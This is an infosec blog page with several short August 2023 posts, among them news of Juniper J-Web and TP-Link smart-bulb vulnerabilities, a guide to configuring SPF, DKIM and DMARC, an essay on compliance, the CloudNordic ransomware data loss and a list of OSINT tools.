Mastering Nmap: A Comprehensive Guide to Network Discovery and Security
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 31 2023
THIS CODE ALLOW TO HACK INTO JUNIPER SRX FIREWALLS AND EX SWITCHES
Juniper Networks, a company that manufactures widely used networking equipment as well as security solutions, has issued a warning about vulnerabilities that are present in the operating systems of many of its devices.
The business has acknowledged in not one but two distinct security alerts that were either released or revised this week that theĀ Junos OSĀ and the Junos OS Evolved operating systems may be susceptible to attacks. Additionally, the corporation issued an updated warning about vulnerabilities that are present in the SRX firewalls and EX switches used by the company.
In a fresh warning itĀ said that earlier versions of the operating systems might get stalled due to the processing of erroneous messages in the code known as the Border Gateway Protocol (BGP), which is responsible for directing all traffic on the internet.
To be more specific, a āUPDATEā message that is formatted in a particular manner āwill eventually create a sustained Denial of Service (DoS) condition for impacted devices,ā which would prevent such devices from carrying out their duties.
A security advisory that had been issued in June and was connected to BGP was also updated by the business on Wednesday. This issue also addressed the possibility of attacks that denied service to users.
In both instances, the corporation was providing workarounds as a means of resolving the problems āout of cycleā from its typical operating system update releases.
A third warning, issued on August 17 and most recently updated on Wednesday, refers to vulnerabilities in J-Web, which is an interface for the SRX firewalls and EX switches used by the firm, which researchers in the security field at Watchtower Labs investigated.
In such a scenario, āan unauthenticated, network-based attackerā has the ability to link together the exploitation of the vulnerabilities āto remotely execute code on the devices.ā
In addition, the Cybersecurity and Infrastructure Security Agency (CISA) released a brief advisory on Wednesday about the vulnerabilities in the operating system.
In addition to that, researchers carried out extensive study, the results of which offered a comprehensive understanding about the exploitation of this weakness as well as the vulnerabilities associated to it.
In the course of their investigation, the researchers focused on two particular vulnerabilities in Juniper (CVE-2023-36846 and CVE-2023-36845), both of which were described in the companyās security advisory. Both of these vulnerabilities, Missing authentication for key functions and PHP External Variable Modification, have something in common: they both affect PHP.
After further investigation, it was found that the J-Web was totally developed in PHP, and that the authentication process is handled by a user class. In addition, a PHP file called webauth_operation.php was found.
In addition, a total of 150 distinct functions, which served a variety of purposes ranging from basic aids to the formatting of IP addresses, were found to be in use. These functions ranged in complexity from simple to complicated. Every one of these tasks required interaction with the command line interface (CLI) of the appliance.
Researchers from Watchtwr have produced a comprehensive analysis, which can be seen on their website. The report contains in-depth information on these vulnerabilities as well as the techniques used to attack them.
It has been announced that a repository on GitHub containing the Proof-of-concept for this vulnerability has been made available. Security professionals may utilize this repository to test and repair their susceptible environments using the Proof-of-concept.
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 30 2023
Email Authentication Protocols: SPF, DKIM, and DMARC ā A Detailed Guide
Email communication is essential for personal and professional contact in the modern digital environment.
Email is widely used, making it a perfect target for cybercriminals, leading to increased phishing attempts, spam, and email spoofing.
Strong email security measures are becoming essential as these threats become more sophisticated. Email authentication techniques like SPF, DKIM, and DMARC are crucial in situations like this.
By authenticating the senderās identity and confirming the accuracy of the received messages, these procedures act as the first line of protection against email-based threats.
This article will thoroughly review these three importantĀ email authenticationĀ methods, including their roles, how they cooperate, and why they are crucial for upholding a reliable and secure email communication infrastructure.
What are Email Authentication Protocols?
Secure email communications can be achieved through Email Authentication Protocols, standards, or technologies that validate the senderās identity and protect the messageās integrity.
These standards aim to protect users from spam, phishing, and other malicious email-based assaults.
As a bonus, they make it less likely that a good email will be incorrectly deleted as spam or malware.
Here are the primary email authentication protocols commonly in use:
- Sender Policy Framework (SPF)
- DomainKeys Identified Mail (DKIM)
- Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Sender Policy Framework (SPF)
The Sender Policy Framework (SPF) is an email authentication technology developed to prevent spam.
By letting domain owners choose which mail servers can send emails on their behalf, SPF assists receiving servers in authenticating the sender of incoming messages.
For this purpose, the DNS records of the domain are consulted to ensure that the emails come from the addresses they claim to represent.
The Sender Policy Framework (SPF) aims to improve email security by limiting the possibility that an unauthorized sender may use a specific domain in the āFromā address.
This helps keep the senderās and the recipientās inboxes free of unwanted messages and strengthens the confidence each party has in email.
How It Works
- Domain owners create SPF records showing trusted IP addresses and domains from which emails can be sent.
- Email servers do a Sender Policy Framework (SPF) record check whenever they receive an email.
- When a message is received, the server checks the IP address to see if it is one of the approved senders mentioned in the SPF record.
- The SPF check is successful if the sending IP address is known and accepted; otherwise, the email may be flagged as suspicious and deleted.
How Do Attackers Abuse SPF:
Sender Policy Framework (SPF) is an email authentication system that checks the senderās name to stop email spoofing and phishing. But, like any other system, SPF isnāt completely safe from possible attack vectors. Here are some possible ways to attack SPF:
Manipulating SPF Records: Attackers could try to change or create SPF records by changing the DNS records of a domain. This would let them list unauthorized IP addresses or servers as valid senders. This can make it possible for tactics like spoofing or phishing to work.
Domain Hijacking: If an attacker takes control of a legal domain, they can change the SPF records to include their own malicious servers. This can cause bad emails that look like they came from a trusted source to be sent.
Subdomain Attacks: SPF records are often set up for an organizationās primary domain, but they might forget to set up SPF records for subdomains. Attackers who send emails from subdomains without the proper SPF records can use this against you.
Inadequate SPF Policies:Ā Organizations may have weak SPF policies that let many IP addresses send emails on their behalf. This can give attackers a bigger pool of possible IP numbers to trick people.
DomainKeys Identified Mail (DKIM)
DomainKeys Identified Mail (DKIM) is an email authentication technology that uses encryption to confirm an emailās authenticity.
The sending server adds a distinctive DKIM signature using a private key to each email. The receiving server verifies the signature of the incoming email using a public key obtained from the senderās DNS records.
If it matches, the email can be trusted as genuine and safe from tampering. DKIM is designed to prevent email spoofing and phishing attacks and guarantee the safe delivery of email communications by verifying the senderās domain and the messageās encrypted signature.
How It Works
- Using a private key, the emailās computer makes a digital signature.
- The email packaging has been changed to include this signature.
- From the DNS records, the email server that receives the email gets the senderās public key.
- The digital signature is then decrypted and checked using the public key.
- The genuine email has not been changed if the signature is correct.
How Do Attackers Abuse DKIM
- Private Key Compromise: DKIM relies on a private key stored on the sending server to sign outgoing emails. If an attacker gains access to the private key, they can sign malicious emails that recipients might consider legitimate, as the DKIM signature would appear valid.
- DNS Record Manipulation: DKIM public keys are stored in DNS records as text (TXT) records. If an attacker gains control over a domainās DNS records, they could modify or replace the DKIM public key, allowing them to sign fraudulent emails that appear authentic.
- Subdomain Spoofing: Organizations might configure DKIM for their main domain but overlook implementing it for subdomains. Attackers could then send emails from subdomains that lack proper DKIM signing, making it harder for recipients to verify the emailās authenticity.
- Key Length and Algorithms: If an organization uses weak encryption algorithms or short key lengths for DKIM signing, it becomes easier for attackers to crack the encryption and forge DKIM signatures.
Solution: Organizations should adopt efficient incident response plans, regularly monitor email traffic for anomalies, and stay updated on emerging threats to stay ahead of the evolving email threat landscape with AI-powered solutions like Trustifi.
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
To improve upon SPF and DKIM, a new email authentication protocol called Domain-based Message Authentication, Reporting, and Conformance (DMARC) was developed.
Domain administrators can instruct receiving mail servers on what to do with messages that do not pass authentication.
Domain owners can direct mail servers to stop accepting spam by adding a DMARC policy record to their DNS settings. Email traffic and any security risks can be better understood using DMARCās reporting features.
DMARC is designed to strengthen email security by adding an extra layer of verification, decreasing phishing and spoofing, and increasing the credibility and delivery of legitimate communications.
How it Works
- The receiving server references the DMARC policy if SPF or DKIM authentication fails.
- The DMARC policy can direct the server to take various actions, such as classifying spam, placing it in quarantine, or outright rejecting it.
- To improve their email protection measures, domain administrators can use forensic and aggregate data on authentication activity.
DMARC Attack Vector
Aggressive Enforcement: Some organizations may choose to use DMARC with a strategy of āquarantineā or ārejectā right from the start. This can work, but if the policy isnāt carefully set, it can also cause valid emails to be blocked.
Reporting Address Spoofing: Attackers could try to change the DMARC reporting address to send reports of failed DMARC checks to sites they control. This could give them a chance to learn more about how the organizationās email system works.
Targeted Spoofing: Attackers could try to pose as people or parts of an organization that havenāt fully set up DMARC. This specific method makes it more likely that their emails will be read.
As with other email-related attacks, attackers could use social engineering to get receivers to ignore DMARC warnings or think a DMARC-failed email is real.
Where are SPF, DKIM, and DMARC Records Stored?
Spf records:
SPF records are TXT (text) records in the DNS. Emails from this domain must be sent from the IP addresses or parts specified in these records.
The recipientās email server will check the SPF record for the senderās field in the Domain Name System (DNS) to ensure the email is legitimate.
Example SPF record:
v=spf1 ip4:192.0.2.1 ip6:2001:db8::1 include:example.com all
DKIM Records:
DKIM records are similarly stored in DNS, although they are TXT entries. These entries store the public key to authenticate the domainās digital signatures in outgoing emails.
The DKIM record is retrieved from the DNS by the receiving email server, which then uses the public key to verify the signature and ensure the emailās authenticity.
Example DKIM record:
v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDnWLKu6qIH66AjqkMYyq3A5bkD
sY+T4rQzSXFJWzh7DQoKmmrkRDbCIPRrkRHF/EpTExGDD2P8WOEqdGTfVbRy14
5k3soVGMItcL1QvWskhNKLQYGJME6XE1WUCmAw29FcYKavqnGQFWFpDBIMVFOFw
7/TZS0Lj1QIDAQABDMARC Records:
DNS also stores DMARC records in the TXT record format. The measures to take if an email fails SPF or DKIM checks are provided in the domainās DMARC policy, defined by these records.
To keep the domain owner aware of authentication actions, DMARC additionally provides reporting tools.
Example DMARC record:
v=DMARC1; p=quarantine; pct=25; rua=mailto:reports@example.com; ruf=mailto:forensics@example.comChecking an Email for SPF, DKIM, and DMARC Compliance
It takes multiple procedures and the capacity to query DNS records to ensure an email complies with SPF, DKIM, and DMARC.
Here are the measures taken to ensure that an email adheres to these standards:
Check SPF Compliance:
- Extract the IP address of the email server that sent the email from the email headers.
- Retrieve the SPF record from the domainās DNS that the email claims to be sent from. This is usually found in a TXT record in the domainās DNS.
- Check if the sending serverās IP address is listed in the SPF record. If it is, the email passes the SPF check; otherwise, it fails.
Check DKIM Compliance:
- Check the email headers for a DKIM signature. This will usually be found in a header field called āDKIM-Signatureā.
- Extract the ād=ā parameter from the DKIM signature to find the signing domain and the ās=ā parameter to find the selector.
- Retrieve the DKIM public key from the DNS of the signing domain. This will be found in a TXT record at selector>._domainkey.signing domain>ā.
- Use the public key to verify the DKIM signature in the email header. If the signature is valid, the email passes the DKIM check; otherwise, it fails.
Check DMARC Compliance:
- Ensure that the email has passed both the SPF and DKIM checks. At least one of them must pass for the DMARC check to pass.
- Retrieve the DMARC record from the domainās DNS from which the email claims to be sent. This is usually found in a TXT record at ā _dmarc.domain>ā.
- Check if the āFromā address domain matches the SPF domain or the DKIM signing domain. If it does, then the email passes the DMARC alignment check.
- Follow the policy specified in the DMARC record for handling emails that fail the DMARC check.
How to configure SPF, DKIM, and DMARC for a domain
Configure SPF:
- Identify Authorized IP addresses or servers: Determine the IP addresses or servers authorized to send email on behalf of your domain.
- Create an SPF Record: Create an SPF record by creating a TXT record in your domainās DNS settings. The value of this TXT record will start with āv=spf1ā followed by the authorized IP addresses or servers.
Example SPF Record: 'v=spf1 ip4:192.168.0.1 -all'This example authorizes the IP address ā192.168.0.1ā to send emails on behalf of your domain and denies all others.
- Update DNS Settings: Add the SPF record to your domainās DNS settings.
Configure DKIM:
- Generate a DKIM Key Pair: Generate a public-private key pair for DKIM. Your email server will use the private key to sign outgoing emails, and your domainās DNS settings will make the public key available.
- Configure Email Server: Configure your email server to sign outgoing emails using the private DKIM key.
- Create a DKIM Record: Create a DKIM record by creating a TXT record in your domainās DNS settings.
- The name of this TXT record will be in the format selector>._domainkey.yourdomain>ā, and the value will contain your DKIM public key.
Example DKIM Record: 'v=DKIM1; k=rsa; p=MIGfMA0...'This example specifies that the key type is RSA and includes the public key.
- Update DNS Settings: Add the DKIM record to your domainās DNS settings.
Configure DMARC:
- Create a DMARC Record: Create a DMARC record by creating a TXT record in your domainās DNS settings. The name of this TXT record will be ā_dmarc.your domain>ā, and the value will contain your DMARC policy.
Example DMARC Record: 'v=DMARC1; p=reject; rua=mailto:report@example.com'This example specifies that emails that fail the DMARC check should be rejected and that reports should be sent to āreport@example.comā.
- Update DNS Settings: Add the DMARC record to your domainās DNS settings.
Conclusion
The SPF, DKIM, and DMARC standards are essential components of a reliable email security architecture in an age when email is vulnerable to a wide range of attacks.
Though each has advantages and disadvantages, they provide an enormous defense against a significant fraction of email-based attacks.
By implementing these authentication processes, yourĀ email systemsā securityĀ will improve, and your emailsā deliverability will also be enhanced, reducing the possibility that your legitimate messages will be miscategorized as spam.
Applying these standards to your digital communication infrastructure can significantly improve the safety and dependability of your communications.
The Art of Email Security | Email security: attack and defence
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 29 2023
Cyber Security Awareness
Aug 29 2023
Is the cybersecurity communityās obsession with compliance counter-productive?
Does anyone think the chances of surviving a plane crash increase if our tray tables are locked and our carry-on bags are completely stowed under our seats? That weāll be OK if the plane hits a mountain if we have our seat belts buckled securely across our waists? Not even the flight attendants, who will be responsible for throwing us off the plane if we donāt comply, really believe those rituals make us safer. And yet, we check the box every flight because a government agency said we canāt fly unless we do so...
Iām starting to wonder if the obsession with checking boxes in cybersecurity might be akin to securing our tray tables before take-off. We do as weāre told, check all the boxes, pat ourselves on the back, and in the process, distract ourselves from our ultimate goal: stopping the bad actors and protecting our data.
I started to think about this somewhat disconcerting cybersecurity community reality when scanning the titles of some of the attendees at a recent regional cybersecurity conference. I was surprised by the frequency of titles that combined security with compliance. To wit: Manager Information Security and Compliance, Manager, Security and Compliance Advisory, Senior Manager Internal Controls and Compliance, Sr. Manager ā IT Security & Compliance (among others). To add to this: countless āauditorā titles ā roles designed specifically to assure fealty to various standards requirements.
Nearly all enterprise breaches originate in one of three ways, and all cybersecurity professionals know this:
- An unpatched vulnerability
- Credential theft
- Installation of malicious software (typically via phishing)
So, letās try an experiment. Ask a CISO or experienced cybersecurity expert how they would defend their organization against these three breach types if:
1. They could completely ignore standards and compliance, and theyād be given no credit for any level of compliance (and there would be no ramifications for non-compliance)
2. They could re-deploy every dollar of budget allotted to standards compliance and auditing any way they liked
3. Their single objective was to win the game (stop the bad actors, and minimize their organizationās risk of a compromise)
How many would determine that the best use of their resources would be to attain or retain compliance with a cybersecurity standard? And how many would deploy those compliance and auditing resources to patch more vulnerabilities, invest in additional cybersecurity expertise, tools to identify and reduce their external threat footprint, and myriad other effective measures to genuinely reduce their organizationās cyber risk?
Itās not as if dedication to compliance is any more of a guarantee against a breach than any other technology, strategy or prayer. Here are a few examples of compliant companies that have suffered high profile breaches (thanks to ChatGPT for saving me the hours of research otherwise required to build this list):
- Equifax (PCI and NIST CSF)
- Target (PCI)
- Marriott (PCI)
- Anthem (HIPAA)
- Premera Blue Cross (HIPAA)
- CareFirst BCBS (HIPAA)
- SolarWinds (NIST CSF)
This is, of course, not an exhaustive list. Show me a large enterprise that was breached and Iāll show you a large enterprise adhering to multiple compliance standards.
Indeed, just this month,Ā several US government agencies were victims of an attack exploiting a vulnerability in file transfer softwareĀ (albeit a zero-day). Itās fair to assume there are several regulations strictly adhered to by the agencies just breached.
So, why do we continue to be obsessed with cybersecurity compliance, standards, frameworks, etc.? The obvious reason is that organizations can be fined for non-compliance.
And yet, thereās been little effort among cybersecurity experts to challenge regulatory agencies. Indeed, many enthusiastically embrace compliance and congratulate themselves and their teams for achieving it. And, of course, no one loves compliance standards more than vendors, just like every barber in the world would celebrate a new law requiring everyone to get a haircut weekly.
The less obvious reason for our communityās love for compliance is that it covers behinds. āYes, we were breached, but we did everything we were supposed to do, so donāt blame us.ā Coaches in every sport will identify that as a loserās attitude. Champions know thereās no checkbox formula for winning, and thereās no excuse for losing, especially āwe did everything we were supposed to and still lost.ā Itās clicheā, but the best teams and athletes ājust know how to win.ā
Am I suggesting we abandon frameworks and compliance? Not immediately, and not without serious debate and analysis. But there is a case to be made that the compliance-centric philosophy governing cybersecurity decision-making today simply isnāt working, and we in cybersecurity are the living embodiment of (not) Einsteinās definition of insanity: doing the same thing over and over and expecting a different result.
Cybersecurity spendingĀ continues to increase and yet breach incidents are increasing as well. It shouldnāt be sacrilegious to propose that we consider changing our foundational philosophy from checking boxes on a compliance audit form to doing whatever makes sense to defend our organizations, and win.
CISO Desk Reference Guide Executive Primer: The Executiveās Guide to Security Program
Security Awareness: Applying Practical Cybersecurity in Your World
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 28 2023
Security Onion 2.4: Free, open platform for defenders gets huge update
Security Onion is a free and open platform for threat hunting, enterprise security monitoring, and log management. It has been downloaded over 2 million times and is being used by security teams worldwide. Security Onion 2.4 comes with many updates, and the hotfix 2.4.10 release is available onĀ GitHub.
For network visibility, they offer signature-based detection via Suricata, rich protocol metadata and file extraction using Zeek or Suricata, full packet capture via Stenographer, and file analysis via Strelka.
For host visibility, Security Onion offers the Elastic Agent, which provides data collection, live queries via osquery, and centralized management using Elastic Fleet. Intrusion detection honeypots based on OpenCanary can be added to your deployment for even more enterprise visibility. All these logs flow into Elasticsearch, and theyāve built their own UIs for alerts, dashboards, threat hunting, case management, and grid management.
New features in Security Onion 2.4
Over the past year of developing Security Onion 2.4, the developers added new features to give you a better experience and make you more efficient:
Security Onion Console (SOC) has many new features to make you more efficient as a defender:
- SOC now allows you to add a value directly from a record in Hunt, Dashboards, or Alerts as an observable to an existing or new case
- SOC includes a new DNS lookup capability
- SOC includes pivots for relational operators on numbers
- SOC Cases support dynamic observable extraction
- SOC can import PCAP and EVTX files
SOC has many new administration features, so you can spend less time managing your deployment and more time hunting adversaries.
- You can manage users via SOCās Administration section
- SOCās Administration section also includes a new Grid Members Interface to manage adding and removing nodes
- You can configure most aspects of your deployment via the Configuration interface
- SOCās Grid interface has been improved to show more status information about your nodes
- The installer has been simplified and configuring new members of the grid will take place in the Grid Members interface
- SOC authentication has been upgraded to include additional authentication protections, such as rate-limiting login requests. It also supports passwordless login via Webauthn
Endpoint telemetry is more powerful and easier to manage.
- The primary endpoint agent is now Elastic Agent and it provides data collection and live queries via embedded osquery. It replaces the previous osquery, Beats, and Wazuh
- Elastic Agent is managed in Elastic Fleet
- Elastic Agent and Elastic Fleet support Elastic Integrations
- Grafana has been removed and all health metrics can be found in InfluxDB
- The Security Onion ISO image has upgraded from CentOS 7 to Oracle Linux 9
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 27 2023
Windows Forensic
Windows Forensics, include the process of conducting or performing forensic investigations of systems which run on Windows operating systems, It includes analysis of incident response, recovery, and auditing of equipment used in executing any criminal activity.
Malware Forensics Field Guide for Windows Systems: Digital Forensics Field Guides
Windows event log analysis and incident response guide
Diving Deeper Into Windows Event logs for Security Operation Center (SOC) ā Guide
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 26 2023
Cybersecurity insurance is missing the risk
The cybersecurity insurance sector is experiencing swift expansion, with its value surging from around $13 billion in 2022 to a projected $84 billion by 2030, reflecting a robust 26% compound annual growth rate (CAGR). However, insurance providers are encountering challenges when it comes to accurately assessing the potential hazards associated with providing coverage for this category of risk.
Conventional actuarial models are ill-suited for an arena where exceptionally driven, innovative, and astute attackers are actively engaged in orchestrating events that lead to insurable incidents. Precisely gauging potential losses holds utmost importance in establishing customer premiums. However, despite a span of twenty years, there exists a substantial variance in loss ratios across insurance providers, ranging from a deficit of 0.5% to a surplus of 130.6%. The underwriting procedures lack the necessary robustness to effectively appraise these losses and set premiums that reflect a reasonable pricing.
Why is the insurance industry struggling with this?
The problem is with the nature of the threat. Cyber attackers escalate and adapt quickly, which undermines the historical-based models that insurance companies rely on. Attackers are continually shifting their maneuvers that identify victims, cause increasing loss, and rapidly shift to new areas of impact.
Denial of service attacks were once popular but were superseded by data breaches, which cause much more damage. Recently, attackers expanded their repertoire to include ransomware-style attacks that increased the insurable losses ever higher.
Trying to predict the cornerstone metrics for actuary modelers ā the Annual Loss Expectancy and Annual Rate of Occurrence ā with a high degree of accuracy is beyond the current capabilities of insurers. The industry currently conducts assessments for new clients to understand their cybersecurity posture to determine if they are insurable, what should be included/excluded from policies, and to calculate premiums. The current process is to weigh controls against best practices or peers to estimate the security posture of a policyholder.
However, these rudimentary practices are not delivering the necessary level of predictive accuracy.
The loss ratio for insurance firms has been volatile, in a world where getting the analysis wrong can be catastrophic. Variances and unpredictability make insurers nervous. At maximum, they want a 70% loss ratio to cover their payouts and expenses and, according to the National Association of Insurance Commissioners Report on the Cyber Insurance Market in 2021, nearly half of the top 20 insurers, representing 83% of the market, failed to achieve the desired loss ratio.
In response to failures to predict claims, insurers have been raising premiums to cover the risk gap. In Q4 2021 the renewals for premiums were up a staggering 34%. In Q4 2022 premiums continued to rise an additional 15%.
There are concerns that many customers will beĀ priced outĀ of the market and the insurance industry and left without a means of transferring risk. To the detriment of insurers, the companies may make their products so expensive that they undermine the tremendous market-growth opportunity. Additionally, upper limits for insurability and various exception clauses are being instituted, which diminish the overall value proposition for customers.
The next generation of cyber insurance
What is needed are better tools to predict cyber attacks and estimate losses. The current army of insurance actuaries has not delivered, but there is hope. It comes from the cyber risk community that looks to manage these ambiguous and chaotic risks by avoiding and minimizing losses.
These cybersecurity experts are motivated by optimizing limited resources to prevent or quickly undermine attacks. As part of that continuous exercise, there are opportunities to apply best practices to the insurance model to identify the most relevant aspects that include defensive postures (technology, behaviors, and processes) and understanding the relevant threat actors (targets, capabilities, and methods) to determine the residual risks.
The goal would be to develop a unified standard for qualifying for cyber insurance that would adapt to the rapid changes in the cyber landscape. More accurate methodologies will improve assessments to reduce insurersā ambiguity so they may competitively price their offerings.
In the future, such calculations will be continuous and showcase how a company will benefit by properly managing security in alignment with shifting threats. This should bring down overall premium costs.
The next generation of cyber insurance will rise on the foundations of new risk analysis methodologies to be more accurate and sustain the mutual benefits offered by theĀ insurance industry.
The Cyber Insurance Imperative, 2nd Edition: Updated for Today’s Challenging Risk Landscape
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 25 2023
Cloud Hosting Provider Lost all Customer Data Following Ransomware Attack
Cloud Hosting Provider Lost all Customer Data Following Ransomware Attack
There has been a cyber attack on two cloud hosting providers, namely CloudNordic and Azero Cloud, which Certiqa Holding owns. The cyberattack has resulted in complete data loss for all their customers.
The cloud attack was reportedly on Friday, April 18, 2023, at around 4 AM when CloudNordic and Azero cloud were exposed to a ransomware attack in which the threat actors shut down all the systems, including customer systems, e-mail systems, customersā websites, and everything they gained access to.
Both companies mentioned that they could not and didnāt want to pay the ransom demanded by the threat actors. However, the IT teams of CloudNordic and Azero Cloud are working with external experts to get complete information about the attack and possible recreation.
Unfortunately, the companies could not recover or recreate any customer data, and they have lost every piece of data on their customers, mail servers, web servers, etc.
Current Status
CloudNordic and Azero Cloud are highly affected by this cyber attack, and they have lost largely critical customer data but have re-established communications.
This means they have now deployed blank systems, including name servers, web servers, and mail servers. However, none of them contain any previous data.
The company has sorted out a way to restore the DNS administration interface that can enable users to get email and the web working again.
Attack Explanation
As per the report submitted to Cyber Security News, both companies attempted to migrate between data centers and had some infected systems before the migration, which the company did not know.
Nevertheless, some servers used to manage all the servers were still wired to the previous network. Threat actors gained access to the administration systems with this network misconfiguration, which paved their way toward the backup systems (both primary and secondary backup).
The attackers encrypted all the systems they had access to, including all the virtual machines. Large amounts of data were reported to have been encrypted by the ransomware, but there seems to be no evidence of data being copied.
Both companies claimed there seemed to be no evidence of a data breach and regretted the inconvenience caused to their customers.
With the rise in cyberattacks and cybercriminals, every organization must implement multiple security measures and monitor every piece of traffic to prevent these kinds of cyberattacks.
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 24 2023
Google AI in Workspace Adds New Zero-Trust and Digital Sovereignty Controls
Google announced security enhancements to Google Workspace focused on enhancing threat defense controls with Google AI.
At a Google Cloud press event on Tuesday, the company announced Google Cloudās rollout over the course of this year of new AI-powered data security tools bringing zero-trust features to Workspace, Drive, Gmail and data sovereignty. The enhancements to Google Drive, Gmail, the companyās security tools for IT and security center teams and more are designed to help global companies keep their data under lock and encrypted key and security operators outrun advancing threats.
Jump to:
- Google Cloudās enhancements align with CISAās zero-trust model
- With zero-trust in mind, Google enhances data loss prevention and access
- Googleās new sovereignty controls in Workspace
- Google adds keys to data encryption
- Adding AI to Google Cloud SOC support
The Executive Guide to Zero Trust: Drivers, Objectives, and Strategic Considerations
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 24 2023
HACKING TP-LINK SMART BULBS TO CONTROL SMART HOME AND YOUR LIFE
The Internet of Things (IoT) is currently at its peak, with a rapid expansion of capabilities. This involves converting everyday items like light bulbs and plugs into smart devices controlled via smartphones. The number of IoT devices exceeded 13.8 billion in 2021, expected to quadruple by 2025, but this growth also introduces security risks exploited by cybercriminals. Researchers have discovered that even smart light bulbs, like the Tp-Link Tapo Smart Wi-Fi Multicolor Light Bulb, can be hacked to gather Wi-Fi credentials. They employed PETIoT, an IoT-focused Kill Chain, to assess vulnerabilities in these bulbs. This situation highlights challenges for cybersecurity experts dealing with the growing threats in the IoT landscape.
Because it is a cloud-enabled multicolor smart bulb, the Tapo L530E may be operated using the Tapo app on an Android or iOS device without the need for a hub. Instead, it connects directly to the home Wi-Fi network. According to the findings of the researchers, this particular kind of smart bulb is susceptible to each of the following four vulnerabilities:
LACK OF AUTHENTICATION OF THE SMART BULB WITH THE TAPO APP (8.8 CVSS SCORE, HIGH SEVERITY)
HARD-CODED, SHORT SHARED SECRET (7.6 CVSS SCORE, HIGH SEVERITY)
LACK OF RANDOMNESS DURING SYMMETRIC ENCRYPTION (4.6 CVSS SCORE, MEDIUM SEVERITY)
INSUFFICIENT MESSAGE FRESHNESS (5.7 CVSS SCORE, MEDIUM SEVERITY)
The examination and testing carried out by the security experts indicate the proximity-based attacks that were carried out on the smart bulb that was the target.The attack scenario that causes the greatest concern is one in which an attacker impersonates a bulb and retrieves information about a Tapo user account by exploiting vulnerabilities.
After that, the attacker may extract the victimās WiFi SSID and password by using the Tapo app, allowing them to obtain access to any and all other devices that are connected to the victimās network.
In order for the attack to be successful, the device in question must first be put into setup mode. However, the attacker has the ability to deauthenticate the bulb, which will need the user to re-configure it in order to get the light to work again.The researchers also investigated an MITM (Man-In-The-Middle) attack using a configured Tapo L530E device. This form of attack takes advantage of a vulnerability to intercept and control the connection between the app and the bulb, as well as to capture the RSA encryption keys that are used for further data transmission.
MITM attacks are also possible with unconfigured Tapo devices by leveraging a vulnerability once again by connecting to the WiFi during the setup process, bridging two networks, and routing discovery messages. This will eventually allow the attacker to retrieve Tapo passwords, SSIDs, and WiFi passwords in an easily decipherable base64 encoded form. Last but not least, a further flaw enables attackers to conduct what are known as āreplay attacks.ā These attacks involve recreating communications that have been sniffed in the past in order to bring about functional changes in the device.
In response, TP-Link gave the researchers their assurance that the issues that were found in their software as well as the firmware of the bulb will be fixed.
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 24 2023
8 open-source OSINT tools you should try
Amass
The OWASPĀ AmassĀ project performs network mapping of attack surfaces and external asset discovery using open-source information gathering and active reconnaissance techniques.
Osmedeus
OsmedeusĀ is a workflow engine for offensive security that allows you to build and run a reconnaissance system on a wide range of targets, including domains, URLs, CIDRs, andĀ GitHubĀ repositories. It was designed to establish a strong foundation and can adapt and function automatically to perform reconnaissance tasks.
PhoneInfoga
PhoneInfogaĀ is an advanced tool to scan international phone numbers. It allows you to gather basic information such as country, area, carrier, and line type, then use various techniques to find the VoIP provider or identify the owner. It works with a collection of scanners that must be configured for the tool to be effective.
Sherlock
SherlockĀ allows you to search social media accounts by username across social networks.
Shodan
ShodanĀ is a search engine for Internet-connected devices. Discover how internet intelligence can help you make better decisions. The entire Shodan platform (crawling, IP lookups, searching, and data streaming) is available to developers. Use their API to understand whether users connect from a VPN, whether the website youāre visiting has been compromised, and more.
Social Analyzer
Social AnalyzerĀ is an API, CLI, and web app for analyzing and finding a personās profile across social media and websites. It includes different analysis and detection modules; you can choose which modules to use during the investigation process. The analysis and public extracted information from this OSINT tool could help investigate profiles related to suspicious or malicious activities such as cyberbullying, cyber grooming, cyberstalking, and spreading misinformation.
SpiderFoot
SpiderFootĀ is an OSINT automation tool. It integrates with just about every data source available and utilizes a range of methods for data analysis, making that data easy to navigate. SpiderFoot has an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line.
theHarvester
theHarvesterĀ is a simple to use, yet powerful tool designed to be used during the reconnaissance stage of a red team assessment or penetration test. It performs OSINT gathering to help determine a domainās external threat landscape. The tool gathers names, emails, IPs, subdomains, and URLs by using multiple public resources.
OSINT Tools: A Practical Guide to Collection, Analysis, and Visualization
InfoSec toolsĀ |Ā InfoSec servicesĀ |Ā InfoSec booksĀ |Ā Follow our blogĀ |Ā DISC llc is listed on The vCISO Directory
Aug 22 2023
Major Mississippi hospital system takes services offline after cyberattack
